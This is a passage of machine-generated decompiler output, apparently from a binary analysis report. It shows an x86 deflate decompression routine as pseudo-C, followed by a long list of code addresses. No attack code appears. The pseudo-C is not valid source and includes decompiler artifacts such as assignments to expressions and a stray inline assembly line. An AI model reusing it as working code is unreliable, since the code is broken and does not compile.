												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L181;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L181;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L184;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L173:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L164:
												__esi[0x26ea] = __edi;
												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L184;
												} else {
													goto L173;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if (__eax == __edx) goto L164;
											asm("adc ecx, [ebx+0x73f83bfa]");
										case 7:
											L174:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L176;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L183;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L181;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e70;
												if( *0x432e70 != 0) {
													L22:
													_t412 =  *0x40a5c8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5cc; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431cec; // 0x4325f0
													_t446[5] = _t414;
													_t415 =  *0x431ce8; // 0x432df0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L181;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431cf0;
													do {
														L15:
														__eflags = _t416 - 0x431f2c;
														_t438 = 8;
														if(_t416 > 0x431f2c) {
															__eflags = _t416 - 0x4320f0;
															if(_t416 >= 0x4320f0) {
																__eflags = _t416 - 0x432150;
																if(_t416 < 0x432150) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														L20:
														 *_t416 = _t438;
														_t416 = _t416 + 4;
														__eflags = _t416 - 0x432170;
													} while (_t416 < 0x432170);
													E004072B4(0x431cf0, 0x120, 0x101, 0x4084e0, 0x408520, 0x431cec, 0x40a5c8, 0x4325f0, _t448 - 8);
													_push(0x1e);
													_pop(_t440);
													_push(5);
													_pop(_t419);
													memset(0x431cf0, _t419, _t440 << 2);
													_t450 = _t450 + 0xc;
													_t442 = 0x431cf0 + _t440;
													E004072B4(0x431cf0, 0x1e, 0, 0x408560, 0x40859c, 0x431ce8, 0x40a5cc, 0x4325f0, _t448 - 8);
													 *0x432e70 =  *0x432e70 + 1;
													__eflags =  *0x432e70;
													goto L22;
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L181;
											}
											L8:
											if(_t423 != 1) {
												goto L181;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L183;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405D2F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L181;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L184;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L183;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L183;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E004072B4( &(__esi[3]), __edi, 0x101, 0x4084e0, 0x408520, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E004072B4(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408560, 0x40859c, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L176:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L184:
												__edi = 0;
												goto L10;
											} else {
												L180:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L185:
													0 = 1;
													goto L10;
												}
												goto L181;
											}
									}
								}
								L182:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L183:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                            0x00406add
                                                                            0x00406add
                                                                            0x00406add
                                                                            0x00406add
                                                                            0x00406add
                                                                            0x00406ae1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ae7
                                                                            0x00406ae7
                                                                            0x00406aea
                                                                            0x00406aed
                                                                            0x00406af2
                                                                            0x00406af4
                                                                            0x00406af7
                                                                            0x00406afa
                                                                            0x00406afd
                                                                            0x00406afd
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b02
                                                                            0x00406b02
                                                                            0x00406b05
                                                                            0x00406b0a
                                                                            0x00406b0c
                                                                            0x00406b0f
                                                                            0x00406b15
                                                                            0x00406874
                                                                            0x00406874
                                                                            0x00406877
                                                                            0x0040687d
                                                                            0x00406883
                                                                            0x0040688c
                                                                            0x00406892
                                                                            0x00406895
                                                                            0x0040689c
                                                                            0x004068a1
                                                                            0x004068a7
                                                                            0x004068b2
                                                                            0x004068b2
                                                                            0x00406b1b
                                                                            0x00406b1b
                                                                            0x00406b25
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b2b
                                                                            0x00406b2b
                                                                            0x00406b2f
                                                                            0x00406b32
                                                                            0x00406b32
                                                                            0x00406b36
                                                                            0x00406b3c
                                                                            0x00406b3c
                                                                            0x00406b3f
                                                                            0x00406b42
                                                                            0x00406b48
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b4a
                                                                            0x00406b6c
                                                                            0x00406b6c
                                                                            0x00406b6f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b4c
                                                                            0x00406b50
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b56
                                                                            0x00406b56
                                                                            0x00406b59
                                                                            0x00406b5c
                                                                            0x00406b61
                                                                            0x00406b63
                                                                            0x00406b66
                                                                            0x00406b69
                                                                            0x00406b69
                                                                            0x00406b71
                                                                            0x00406b71
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b7d
                                                                            0x00406b84
                                                                            0x00406b88
                                                                            0x00406b8c
                                                                            0x00406b8f
                                                                            0x00406b92
                                                                            0x00406b98
                                                                            0x00406b9d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b9f
                                                                            0x00406bb3
                                                                            0x00406bb3
                                                                            0x00406bb7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba4
                                                                            0x00406bab
                                                                            0x00406bb0
                                                                            0x00406bb0
                                                                            0x00406bb0
                                                                            0x00406bb9
                                                                            0x00406bb9
                                                                            0x00406bbc
                                                                            0x00406bca
                                                                            0x00406bd0
                                                                            0x00406bd5
                                                                            0x00406bdb
                                                                            0x00406be1
                                                                            0x00406be7
                                                                            0x00406bee
                                                                            0x00406c02
                                                                            0x00406c02
                                                                            0x004071d1
                                                                            0x004071d1
                                                                            0x004071d1
                                                                            0x004071d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040680e
                                                                            0x0040680e
                                                                            0x00000000
                                                                            0x00406e09
                                                                            0x00406e09
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e1c
                                                                            0x00406e1c
                                                                            0x00406e41
                                                                            0x00406e41
                                                                            0x00406e41
                                                                            0x00406e43
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e21
                                                                            0x00406e21
                                                                            0x00406e25
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e2b
                                                                            0x00406e2b
                                                                            0x00406e2e
                                                                            0x00406e31
                                                                            0x00406e34
                                                                            0x00406e36
                                                                            0x00406e38
                                                                            0x00406e3b
                                                                            0x00406e3e
                                                                            0x00406e3e
                                                                            0x00406e3e
                                                                            0x00406e45
                                                                            0x00406e45
                                                                            0x00406e4d
                                                                            0x00406e50
                                                                            0x00406e53
                                                                            0x00406e56
                                                                            0x00406e5a
                                                                            0x00406e5d
                                                                            0x00406e5f
                                                                            0x00406e62
                                                                            0x00406e64
                                                                            0x00406e78
                                                                            0x00406e78
                                                                            0x00406e7b
                                                                            0x00406e95
                                                                            0x00406e95
                                                                            0x00406e98
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e9e
                                                                            0x00406e9e
                                                                            0x00406ea1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ea7
                                                                            0x00406ea7
                                                                            0x00000000
                                                                            0x00406ea7
                                                                            0x00406e7d
                                                                            0x00406e80
                                                                            0x00406e87
                                                                            0x00406e8a
                                                                            0x00000000
                                                                            0x00406e8a
                                                                            0x00406e66
                                                                            0x00406e6a
                                                                            0x00406e6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406eb2
                                                                            0x00406eb2
                                                                            0x00406ed7
                                                                            0x00406ed7
                                                                            0x00406ed7
                                                                            0x00406ed9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406eb7
                                                                            0x00406eb7
                                                                            0x00406ebb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ec1
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec7
                                                                            0x00406eca
                                                                            0x00406ecc
                                                                            0x00406ece
                                                                            0x00406ed1
                                                                            0x00406ed4
                                                                            0x00406ed4
                                                                            0x00406ed4
                                                                            0x00406edb
                                                                            0x00406ee3
                                                                            0x00406ee6
                                                                            0x00406ee9
                                                                            0x00406eeb
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406ef0
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406efa
                                                                            0x00406efd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f03
                                                                            0x00406f03
                                                                            0x00406f28
                                                                            0x00406f28
                                                                            0x00406f28
                                                                            0x00406f2a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f15
                                                                            0x00406f18
                                                                            0x00406f1b
                                                                            0x00406f1d
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f25
                                                                            0x00406f25
                                                                            0x00406f2c
                                                                            0x00406f2c
                                                                            0x00406f34
                                                                            0x00406f37
                                                                            0x00406f3a
                                                                            0x00406f3d
